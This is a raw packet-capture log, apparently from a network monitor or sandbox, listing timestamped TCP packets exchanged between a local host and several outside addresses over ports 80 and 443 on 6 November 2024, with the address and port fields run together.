                                                                                                                                            Nov 6, 2024 16:40:32.370769024 CET8057300107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.958360910 CET5730480192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:32.963270903 CET8057304140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.963468075 CET5730480192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:33.173594952 CET5730480192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:33.178744078 CET8057304140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.537075043 CET8057300107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.537321091 CET5730080192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:33.543230057 CET8057300107.148.237.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.543297052 CET5730080192.168.2.10107.148.237.1
                                                                                                                                            Nov 6, 2024 16:40:33.546324968 CET5730680192.168.2.10116.132.218.191
                                                                                                                                            Nov 6, 2024 16:40:38.769007921 CET4435733736.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:38.769093037 CET57337443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:38.769093037 CET57337443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:38.777990103 CET4435733836.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:38.778073072 CET57338443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:38.778073072 CET57338443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:38.778714895 CET4435733036.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:38.778784990 CET57330443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:38.778784990 CET57330443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:38.788131952 CET4435733636.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:38.788224936 CET57336443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:38.788224936 CET57336443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:38.791157007 CET4435733136.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:38.791255951 CET57331443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:38.791255951 CET57331443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:38.834227085 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:38.835803032 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:38.838218927 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:38.838354111 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:38.844647884 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:38.850938082 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.178335905 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.178457022 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.178471088 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.178507090 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.178596973 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.178596973 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.197185993 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.197211027 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.197223902 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.197308064 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.197336912 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.197336912 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.198693037 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.215893984 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.215962887 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.215977907 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.215990067 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.216028929 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.216156006 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.235174894 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.235187054 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.242801905 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.252748013 CET8057343140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.297112942 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.297133923 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.297147036 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.298793077 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.300889969 CET5734380192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:39.315704107 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.315718889 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.318778038 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.355050087 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.355159044 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.355170012 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.355180979 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.355272055 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.355272055 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.355357885 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.360752106 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.370229006 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.370338917 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.370366096 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.370382071 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.370393038 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.370450020 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.370753050 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.396954060 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.397033930 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.398008108 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.415847063 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.415862083 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.415874004 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.415978909 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.415978909 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.434459925 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.434473991 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.434535980 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.443841934 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.443855047 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.449836016 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.466953993 CET8057343140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.473932981 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.474020004 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.474030972 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.474050045 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.474061966 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.474140882 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.474140882 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.486685038 CET4435733436.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.486798048 CET57334443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:39.486798048 CET57334443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:39.488794088 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.489118099 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.490712881 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.515516043 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.515531063 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.515543938 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.515597105 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.519603014 CET5734380192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:39.534147978 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.534169912 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.534183025 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.534249067 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.540934086 CET5734380192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:39.546201944 CET8057343140.206.225.136192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.546256065 CET5734380192.168.2.10140.206.225.136
                                                                                                                                            Nov 6, 2024 16:40:39.553050041 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.553138018 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.553149939 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.553163052 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.553189039 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.553206921 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.565033913 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.565047979 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.565088987 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.565128088 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.592746019 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.592808962 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.592824936 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.592839003 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.592852116 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.592861891 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.592880011 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.592901945 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.594108105 CET4435733336.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.594183922 CET57333443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:39.594183922 CET57333443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:39.608160973 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.608198881 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.608207941 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.608234882 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.634234905 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.634258986 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.275432110 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.275490999 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.275521040 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.275531054 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.275661945 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.275893927 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.275944948 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.306107998 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.306129932 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.306143999 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.306174994 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.306188107 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.306200027 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.306216955 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.306235075 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.307898998 CET4435733536.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.307960033 CET57335443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:40.307976961 CET57335443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:40.320648909 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.320662975 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.320677042 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.320717096 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.320736885 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.347666025 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.347687960 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.347700119 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.347735882 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.347765923 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.367049932 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.367063046 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.367074013 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.367080927 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.367172003 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.383797884 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.383922100 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.383934975 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.383994102 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.384020090 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.393989086 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.394025087 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.394134045 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.425087929 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.425112009 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.425127029 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.425169945 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.425196886 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.425204992 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.425214052 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.425291061 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.425594091 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.426759958 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.439223051 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.439265013 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.439277887 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.439338923 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.439356089 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.465614080 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.465635061 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.465656996 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.465698004 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.465737104 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.485624075 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.485697985 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.485711098 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.485722065 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.485743999 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.485852957 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.485929012 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.485940933 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.486011028 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.486032963 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.502322912 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.502341032 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.502353907 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.502403021 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.502448082 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.543694973 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543721914 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543742895 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543756962 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543771029 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543783903 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.543817043 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.543868065 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543881893 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543895006 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543924093 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.543945074 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.558577061 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.558593988 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.558608055 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.558703899 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.558703899 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.584201097 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.584249020 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.584259987 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.584271908 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.584300041 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.584330082 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.604204893 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.604224920 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.604238987 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.604285002 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.604315996 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.621056080 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621074915 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621088982 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621104002 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621117115 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621133089 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621138096 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.621180058 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.662309885 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662332058 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662347078 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662389040 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.662414074 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.662527084 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662549019 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662563086 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662580967 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662585974 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.662595034 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662621021 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.662631989 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.676573992 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.676594973 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.676613092 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.676655054 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.676683903 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.703059912 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.703098059 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.703110933 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.703172922 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:45.561577082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.561594009 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.561633110 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.680700064 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.680732012 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.680850983 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.680871964 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.680911064 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.800035000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.800061941 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.800199032 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.800216913 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.800255060 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.928385019 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.928450108 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.928544044 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.928560019 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.928597927 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.962694883 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.962749004 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.962789059 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.962807894 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:45.962829113 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:45.962850094 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:46.047702074 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.047765970 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:46.047780991 CET57356443192.168.2.10113.200.1.7
